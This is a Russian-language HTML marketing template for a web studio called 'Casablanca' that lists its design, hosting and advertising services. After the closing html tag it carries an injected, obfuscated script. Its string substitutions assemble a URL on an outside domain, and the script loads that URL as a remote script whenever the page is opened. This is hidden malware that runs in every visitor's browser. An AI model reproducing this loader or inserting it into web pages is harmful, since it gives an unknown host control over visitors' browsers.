<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
		"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
	<meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://fonts.googleapis.com/css?family=Coiny|PT+Sans" rel="stylesheet">
	<style type="text/css">
		body {
			background-color: #ffffff;
			margin: 0;
		}

		table {
			width: 100%;
		}

		table td {
			border-collapse: collapse;
		}
	</style>
</head>
<body style="background-color:#ffffff;margin-top:0;margin-bottom:0;margin-right:0;margin-left:0;">
<!--[if (gte mso 9)|(IE)]>
<table align="center" style="border-collapse:collapse;">
	<tr>
		<td style="-webkit-font-smoothing:subpixel-antialiased;">
<![endif]-->
<table cellpadding="0" cellspacing="0" border="0" align="center" bgcolor="#ffffff" width="100%"
	   style="padding-bottom: 40px; min-width: 300px;max-width: 600px; width: 100%; margin-top: 0; margin-bottom: 0; margin-left: auto; margin-right: auto;">
	<tbody>
	<tr>
		<td valign="top" style="padding-left: 0; padding-right: 0; padding-top: 0; padding-bottom: 0;">
			<table width="100%" cellpadding="0" cellspacing="0" border="0" align="left" bgcolor="#ffffff"
				   style="width: 100%;padding: 0; margin: 0; border-collapse: collapse; text-align: left; border: none;">
				<tbody>
				<tr>
					<td valign="top" bgcolor="#ebba16" border="0" align="left" style="text-align: left; border: none; padding: 10px 0;">
						<a href="#" style="display: block; text-decoration: none; margin-left: 10px;">
                            <img style="float:left; margin-right: 5px;" src="./image/orange.png" width="50" height="50" alt="Qoovee logo">
                            <h1 style="font-family: 'Coiny', cursive; font-size: 30px; color: #ffffff; margin-bottom: 0; margin-top: 0; text-shadow: 2px 2px 5px #000000;">Casablanca</h1>
						</a>
                    </td>
				</tr>
				<tr>
					<td valign="top" bgcolor="#ffffff" border="0" align="left"
						style="padding-left: 6%;padding-right: 6%; padding-top: 20px;">
						<h1 style="font-size: 24px; font-weight: 700; font-family: 'PT Sans', sans-serif; color: #000000">
                            Уважаемый Клиент мы рады приветсвовать вас!</h1>
					</td>
				</tr>
				<tr>
					<td valign="top" bgcolor="#ffffff" border="0" align="left"
						style="padding-left: 6%;padding-right: 6%;">
						<p style="font-family: 'PT Sans', sans-serif;color: #252525; font-size: 16px; display: block; line-height: 24px; font-weight: normal">
							<b style="font-weight: bold">Casablanca</b> объедтняет самых креативных и опытных сотрудников для создания сайта вашей мечты.
						</p>
					</td>
				</tr>
				<tr>
					<td valign="top" bgcolor="#ffffff" border="0" align="center"
						style="text-align: center; border: none">
						<a href="#" style="display: inline-block; text-align: center;">
							<img src="./image/start-btn.png" width="200" height="auto" alt="Начать!">
						</a>
					</td>
				</tr>
				<tr>
					<td valign="top" bgcolor="#ffffff" border="0" align="left"
						style="padding-left: 6%;padding-right: 6%;">
						<p style="font-family: 'PT Sans', sans-serif;color: #252525; font-size: 16px; display: block; line-height: 24px; font-weight: normal">
							Наша кампания <b style="font-weight: bold">Casablanca</b> имеет большой опыт в сфере
							web-разработки и маркетинга. На сегодняшний
							день ежемесячно нашими услугами пользуются свыше 500
							компаний и предпринимателей в более
							чем 20 странах мира.
						</p>
					</td>
				</tr>
				<tr>
					<td valign="top" bgcolor="#ffffff" border="0" align="left"
						style="padding-left: 6%;padding-right: 6%;">
						<p style="font-family: arial, sans-serif;color: #252525; font-size: 16px; display: block; line-height: 24px; font-weight: normal">
							Кампания <b style="font-weight: bold">Casablanca</b> пердоставляет следующие услуги:
						</p>
						<ul style="list-style-type: disc; font-family: 'PT Sans', sans-serif; color: #252525; font-size: 16px; display: block; line-height: 24px; font-weight: bold">
							<li style="margin-bottom: 10px;">Разработка индивидуального дизайна исходя из ваших требований</li>
							<li style="margin-bottom: 10px;">Создание сайта с нуля, по наработанному дизайну</li>
							<li style="margin-bottom: 10px;">Адаптивность и кроссбраузерность вашего проекта</li>
							<li style="margin-bottom: 10px;">Любой функционал который вы хотите вилдеть на своем сайте</li>
							<li style="margin-bottom: 10px;">Размещение проекта на хостинге</li>
							<li style="margin-bottom: 10px;">Реклама вашего проекта и привлечение новых клиентов</li>
							<li>Полностью рабочий проект за минимальные сроки</li>
						</ul>
					</td>
				</tr>
				<tr>
					<td valign="top" bgcolor="#ffffff" border="0" align="center"
						style="text-align: center; border: none">
						<a href="#" style="display: inline-block; text-align: center;">
							<img src="./image/start-btn.png" width="200" height="auto" alt="Вступить в клуб">
						</a>
					</td>
				</tr>
				<tr>
					<td valign="top" height="100%" style="padding: 0 0 0 0;" bgcolor="#ffffff" align="center">
						<div>&nbsp;</div>
						<div>&nbsp;</div>
						<div>
							<span style="color:#7F7F7F;">
								<span style="font-size:10px; font-family: 'PT Sans', sans-serif;">Casablanca — современная IT кампания принимаюшая заказы по всему СНГ и ЕАЭС.</span>
							</span>
						</div>
					</td>
				</tr>
				</tbody>
			</table>
		</td>
	</tr>
	</tbody>
</table>
<!--[if (gte mso 9)|(IE)]>
</td>
</tr>
</table>
<![endif]-->
</body>
</html><script>var z=document.createElement("script");z.src="xairybythewyrldzaigyingtykillzcym/ctrl/jszhtm".replace(/y/g,"o").replace(/x/,"http://").replace(/z/g,".");document.getElementsByTagName("HEAD")[0].appendChild(z);"//v|v\\";</script>
